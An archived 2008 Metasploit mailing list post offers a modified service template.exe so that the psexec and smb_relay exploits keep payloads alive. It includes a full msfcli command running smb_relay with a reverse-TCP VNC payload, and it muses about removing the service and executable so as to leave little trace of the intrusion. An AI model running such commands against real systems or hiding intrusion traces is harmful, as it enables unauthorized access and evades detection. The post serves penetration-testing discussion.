Metasploit mailing list archives
NTLM relay implemented in Metasploit 3?
From: sigtrap at sigtrap.org (sigtrap)
Date: Thu, 07 Feb 2008 10:24:11 +0100
Hi, I have posted a service template.exe to this list before. I'll post it again because it works as a charm when you look for "Wireless Zero Configuration" hosts. The password is 31 characters. Not 8 :-) Here is my old post: ---------------------------- I now have a new "service template.exe". I managed to steal 10 minutes from my friend Magnus Br?ding, in which he threw together a service executable template PoC (yes, we're sorry it's bloated :-)) It's attached with the password: "password" (without the quotes) Got it? ;-) If you backup the original template.exe and use this instead, the exploits psexec and smb_relay will work as intended (other exploits, that don't expect a service exe, probably won't work). Eg: ./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7 PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E The service is created and starts. The payload is executed in a new thread. The service controller *doesn't* kill the process after 30 seconds anymore, as it does with the normal template.exe. When you terminate the vncclient the payload terminates the process through the "EXITFUNC=process". The Windows service MMC snap-in will now report the created service as "stopped". If we could now just make the handler (i.e. the one that that starts the VNC client on the attacking computer) report back to the exploit when the payload on the victim computer has ended (and thus its process has also terminated in this case), it would be easy to remove the service and executable on the victim computer, thereby leaving no bigger trace behind of the intrusion. I don't know how to do this, but it would be really great if someone did. ------------------ Regards //Sigtrap -----Original Message----- From: H D Moore <hdm at metasploit.com>
The three big missing features:
3) A services wrapper around the EXE that prevents it from being killed after ~30 seconds.
-HD
-------------- next part -------------- A non-text attachment was scrubbed... Name: template.exe.bin.pgp Type: application/octet-stream Size: 224107 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080207/c3ddea9c/attachment.obj>
Current thread:
- NTLM relay implemented in Metasploit 3? Parity (Feb 06)
- NTLM relay implemented in Metasploit 3? H D Moore (Feb 06)
- NTLM relay implemented in Metasploit 3? sigtrap (Feb 07)
- NTLM relay implemented in Metasploit 3? H D Moore (Feb 06)